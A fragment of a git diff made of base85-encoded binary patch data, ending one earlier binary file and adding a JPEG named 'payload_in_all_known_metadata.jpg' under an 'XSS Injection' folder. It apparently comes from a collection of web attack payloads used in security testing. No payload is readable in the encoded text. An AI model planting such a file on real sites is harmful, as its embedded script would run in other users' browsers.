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
XD__v$jklBsScnE3aXjVNsSE!DU{?H>

literal 0
HcmV?d00001

diff --git a/XSS Injection/Files/payload_in_all_known_metadata.jpg b/XSS Injection/Files/payload_in_all_known_metadata.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..43d7b6a70859a9a130918bb130ad5321b1e6b20f
GIT binary patch
literal 28581
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
